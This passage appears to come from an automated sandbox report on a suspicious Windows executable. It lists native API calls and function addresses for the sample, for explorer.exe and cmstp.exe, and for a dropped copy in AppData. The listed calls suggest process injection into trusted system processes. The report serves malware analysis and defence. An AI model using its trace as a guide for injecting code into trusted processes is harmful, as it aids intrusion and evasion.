Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2CC0 NtQueryVirtualMemory,	9_2_01AB2CC0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2C00 NtQueryInformationProcess,	9_2_01AB2C00
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2C60 NtCreateKey,	9_2_01AB2C60
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2FA0 NtQuerySection,	9_2_01AB2FA0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2F60 NtCreateProcessEx,	9_2_01AB2F60
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2EE0 NtQueueApcThread,	9_2_01AB2EE0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2E30 NtWriteVirtualMemory,	9_2_01AB2E30
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB3090 NtSetValueKey,	9_2_01AB3090
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB3010 NtOpenDirectoryObject,	9_2_01AB3010
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB35C0 NtCreateMutant,	9_2_01AB35C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB39B0 NtGetContextThread,	9_2_01AB39B0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB3D10 NtOpenProcessToken,	9_2_01AB3D10
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB3D70 NtOpenThread,	9_2_01AB3D70
Source: C:\Windows\explorer.exe	Code function: 10_2_10A36232 NtCreateFile,	10_2_10A36232
Source: C:\Windows\explorer.exe	Code function: 10_2_10A37E12 NtProtectVirtualMemory,	10_2_10A37E12
Source: C:\Windows\explorer.exe	Code function: 10_2_10A37E0A NtProtectVirtualMemory,	10_2_10A37E0A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_04BD2CA0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_04BD2C70
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2C60 NtCreateKey,LdrInitializeThunk,	13_2_04BD2C60
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_04BD2DF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2DD0 NtDelayExecution,LdrInitializeThunk,	13_2_04BD2DD0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_04BD2D10
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	13_2_04BD2EA0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2FE0 NtCreateFile,LdrInitializeThunk,	13_2_04BD2FE0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2F30 NtCreateSection,LdrInitializeThunk,	13_2_04BD2F30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2AD0 NtReadFile,LdrInitializeThunk,	13_2_04BD2AD0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_04BD2BF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2BE0 NtQueryValueKey,LdrInitializeThunk,	13_2_04BD2BE0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2B60 NtClose,LdrInitializeThunk,	13_2_04BD2B60
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD35C0 NtCreateMutant,LdrInitializeThunk,	13_2_04BD35C0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD4650 NtSuspendThread,	13_2_04BD4650
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD4340 NtSetContextThread,	13_2_04BD4340
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2CF0 NtOpenProcess,	13_2_04BD2CF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2CC0 NtQueryVirtualMemory,	13_2_04BD2CC0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2C00 NtQueryInformationProcess,	13_2_04BD2C00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2DB0 NtEnumerateKey,	13_2_04BD2DB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2D30 NtUnmapViewOfSection,	13_2_04BD2D30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2D00 NtSetInformationFile,	13_2_04BD2D00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2E80 NtReadVirtualMemory,	13_2_04BD2E80
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2EE0 NtQueueApcThread,	13_2_04BD2EE0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2E30 NtWriteVirtualMemory,	13_2_04BD2E30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2FB0 NtResumeThread,	13_2_04BD2FB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2FA0 NtQuerySection,	13_2_04BD2FA0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2F90 NtProtectVirtualMemory,	13_2_04BD2F90
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2F60 NtCreateProcessEx,	13_2_04BD2F60
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2AB0 NtWaitForSingleObject,	13_2_04BD2AB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2AF0 NtWriteFile,	13_2_04BD2AF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2BA0 NtEnumerateValueKey,	13_2_04BD2BA0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD2B80 NtQueryInformationFile,	13_2_04BD2B80
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD3090 NtSetValueKey,	13_2_04BD3090
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD3010 NtOpenDirectoryObject,	13_2_04BD3010
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD3D10 NtOpenProcessToken,	13_2_04BD3D10
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD3D70 NtOpenThread,	13_2_04BD3D70
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD39B0 NtGetContextThread,	13_2_04BD39B0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C1A360 NtCreateFile,	13_2_02C1A360
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C1A490 NtClose,	13_2_02C1A490
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C1A410 NtReadFile,	13_2_02C1A410
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C1A540 NtAllocateVirtualMemory,	13_2_02C1A540
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C1A48A NtClose,	13_2_02C1A48A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C1A40B NtReadFile,	13_2_02C1A40B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04A8A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	13_2_04A8A036
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04A89BAF NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	13_2_04A89BAF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04A8A042 NtQueryInformationProcess,	13_2_04A8A042
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04A89BB2 NtCreateSection,NtMapViewOfSection,	13_2_04A89BB2

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_0288E4C4	0_2_0288E4C4
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_04FE7CE0	0_2_04FE7CE0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_04FE0518	0_2_04FE0518
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_04FE050B	0_2_04FE050B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_04FE7CD0	0_2_04FE7CD0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F804D8	0_2_06F804D8
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F801A0	0_2_06F801A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F88118	0_2_06F88118
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F826B8	0_2_06F826B8
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F826A7	0_2_06F826A7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F8D770	0_2_06F8D770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F8D761	0_2_06F8D761
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F8B718	0_2_06F8B718
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F8B70B	0_2_06F8B70B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F804C8	0_2_06F804C8
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F81498	0_2_06F81498
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F81489	0_2_06F81489
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F8B2E0	0_2_06F8B2E0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F8D260	0_2_06F8D260
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F8D24F	0_2_06F8D24F
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F843E8	0_2_06F843E8
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F843D8	0_2_06F843D8
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F80190	0_2_06F80190
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F88193	0_2_06F88193
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F88109	0_2_06F88109
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F8AE5B	0_2_06F8AE5B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F8AEA8	0_2_06F8AEA8
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 0_2_06F8AE91	0_2_06F8AE91
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_00401030	9_2_00401030
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041D8A3	9_2_0041D8A3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041D99C	9_2_0041D99C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041E558	9_2_0041E558
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_00402D90	9_2_00402D90
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041D5A6	9_2_0041D5A6
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_00409E4D	9_2_00409E4D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_00409E50	9_2_00409E50
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_00402FB0	9_2_00402FB0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B341A2	9_2_01B341A2
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B401AA	9_2_01B401AA
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B381CC	9_2_01B381CC
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A70100	9_2_01A70100
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1A118	9_2_01B1A118
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B08158	9_2_01B08158
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B12000	9_2_01B12000
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B403E6	9_2_01B403E6
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8E3F0	9_2_01A8E3F0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3A352	9_2_01B3A352
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B002C0	9_2_01B002C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20274	9_2_01B20274
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B40591	9_2_01B40591
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80535	9_2_01A80535
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B2E4F6	9_2_01B2E4F6
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B24420	9_2_01B24420
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B32446	9_2_01B32446
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7C7C0	9_2_01A7C7C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80770	9_2_01A80770
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA4750	9_2_01AA4750
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9C6E0	9_2_01A9C6E0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A829A0	9_2_01A829A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B4A9A6	9_2_01B4A9A6
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A96962	9_2_01A96962
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A668B8	9_2_01A668B8
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AAE8F0	9_2_01AAE8F0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8A840	9_2_01A8A840
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A82840	9_2_01A82840
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B36BD7	9_2_01B36BD7
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3AB40	9_2_01B3AB40
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7EA80	9_2_01A7EA80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A98DBF	9_2_01A98DBF
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7ADE0	9_2_01A7ADE0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8AD00	9_2_01A8AD00
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1CD1F	9_2_01B1CD1F
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B20CB5	9_2_01B20CB5
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A70CF2	9_2_01A70CF2
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80C00	9_2_01A80C00
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AFEFA0	9_2_01AFEFA0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8CFE0	9_2_01A8CFE0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A72FC8	9_2_01A72FC8
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B22F30	9_2_01B22F30
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AC2F28	9_2_01AC2F28
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA0F30	9_2_01AA0F30
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF4F40	9_2_01AF4F40
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3CE93	9_2_01B3CE93
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A92E90	9_2_01A92E90
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3EEDB	9_2_01B3EEDB
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3EE26	9_2_01B3EE26
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A80E59	9_2_01A80E59
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8B1B0	9_2_01A8B1B0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB516C	9_2_01AB516C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6F172	9_2_01A6F172
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B4B16B	9_2_01B4B16B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3F0E0	9_2_01B3F0E0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B370E9	9_2_01B370E9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A870C0	9_2_01A870C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B2F0CC	9_2_01B2F0CC
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AC739A	9_2_01AC739A
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3132D	9_2_01B3132D
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6D34C	9_2_01A6D34C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A852A0	9_2_01A852A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B212ED	9_2_01B212ED
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9B2C0	9_2_01A9B2C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1D5B0	9_2_01B1D5B0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B37571	9_2_01B37571
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3F43F	9_2_01B3F43F
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A71460	9_2_01A71460
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3F7B0	9_2_01B3F7B0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B316CC	9_2_01B316CC
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AC5630	9_2_01AC5630
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B15910	9_2_01B15910
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A89950	9_2_01A89950
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9B950	9_2_01A9B950
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A838E0	9_2_01A838E0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AED800	9_2_01AED800
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9FB80	9_2_01A9FB80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01ABDBF9	9_2_01ABDBF9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF5BF0	9_2_01AF5BF0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3FB76	9_2_01B3FB76
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AC5AA0	9_2_01AC5AA0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B21AA3	9_2_01B21AA3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1DAAC	9_2_01B1DAAC
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B2DAC6	9_2_01B2DAC6
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF3A6C	9_2_01AF3A6C
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B37A46	9_2_01B37A46
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3FA49	9_2_01B3FA49
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9FDC0	9_2_01A9FDC0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B37D73	9_2_01B37D73
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A83D40	9_2_01A83D40
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B31D5A	9_2_01B31D5A
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3FCF2	9_2_01B3FCF2
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF9C32	9_2_01AF9C32
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3FFB1	9_2_01B3FFB1
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A81F92	9_2_01A81F92
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B3FF09	9_2_01B3FF09
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A89EB0	9_2_01A89EB0
Source: C:\Windows\explorer.exe	Code function: 10_2_09728912	10_2_09728912
Source: C:\Windows\explorer.exe	Code function: 10_2_09722D02	10_2_09722D02
Source: C:\Windows\explorer.exe	Code function: 10_2_0972E5CD	10_2_0972E5CD
Source: C:\Windows\explorer.exe	Code function: 10_2_0972A036	10_2_0972A036
Source: C:\Windows\explorer.exe	Code function: 10_2_09721082	10_2_09721082
Source: C:\Windows\explorer.exe	Code function: 10_2_09725B32	10_2_09725B32
Source: C:\Windows\explorer.exe	Code function: 10_2_09725B30	10_2_09725B30
Source: C:\Windows\explorer.exe	Code function: 10_2_0972B232	10_2_0972B232
Source: C:\Windows\explorer.exe	Code function: 10_2_10801082	10_2_10801082
Source: C:\Windows\explorer.exe	Code function: 10_2_1080A036	10_2_1080A036
Source: C:\Windows\explorer.exe	Code function: 10_2_1080E5CD	10_2_1080E5CD
Source: C:\Windows\explorer.exe	Code function: 10_2_10802D02	10_2_10802D02
Source: C:\Windows\explorer.exe	Code function: 10_2_10808912	10_2_10808912
Source: C:\Windows\explorer.exe	Code function: 10_2_1080B232	10_2_1080B232
Source: C:\Windows\explorer.exe	Code function: 10_2_10805B30	10_2_10805B30
Source: C:\Windows\explorer.exe	Code function: 10_2_10805B32	10_2_10805B32
Source: C:\Windows\explorer.exe	Code function: 10_2_10A36232	10_2_10A36232
Source: C:\Windows\explorer.exe	Code function: 10_2_10A2C082	10_2_10A2C082
Source: C:\Windows\explorer.exe	Code function: 10_2_10A35036	10_2_10A35036
Source: C:\Windows\explorer.exe	Code function: 10_2_10A395CD	10_2_10A395CD
Source: C:\Windows\explorer.exe	Code function: 10_2_10A30B32	10_2_10A30B32
Source: C:\Windows\explorer.exe	Code function: 10_2_10A30B30	10_2_10A30B30
Source: C:\Windows\explorer.exe	Code function: 10_2_10A2DD02	10_2_10A2DD02
Source: C:\Windows\explorer.exe	Code function: 10_2_10A33912	10_2_10A33912
Source: C:\Windows\explorer.exe	Code function: 10_2_10C74082	10_2_10C74082
Source: C:\Windows\explorer.exe	Code function: 10_2_10C7D036	10_2_10C7D036
Source: C:\Windows\explorer.exe	Code function: 10_2_10C815CD	10_2_10C815CD
Source: C:\Windows\explorer.exe	Code function: 10_2_10C75D02	10_2_10C75D02
Source: C:\Windows\explorer.exe	Code function: 10_2_10C7B912	10_2_10C7B912
Source: C:\Windows\explorer.exe	Code function: 10_2_10C7E232	10_2_10C7E232
Source: C:\Windows\explorer.exe	Code function: 10_2_10C78B32	10_2_10C78B32
Source: C:\Windows\explorer.exe	Code function: 10_2_10C78B30	10_2_10C78B30
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_022CE4C4	11_2_022CE4C4
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_069504D8	11_2_069504D8
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_069501A0	11_2_069501A0
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_06958118	11_2_06958118
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_069526B8	11_2_069526B8
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_069526A7	11_2_069526A7
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_0695B718	11_2_0695B718
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_0695B70A	11_2_0695B70A
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_0695D770	11_2_0695D770
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_0695D761	11_2_0695D761
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_06951498	11_2_06951498
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_06951489	11_2_06951489
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_069504C8	11_2_069504C8
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_0695B2E0	11_2_0695B2E0
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_0695D24F	11_2_0695D24F
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_0695D260	11_2_0695D260
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_069543D8	11_2_069543D8
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_069543E8	11_2_069543E8
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_06950190	11_2_06950190
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_06958193	11_2_06958193
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_0695810A	11_2_0695810A
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_0695AE91	11_2_0695AE91
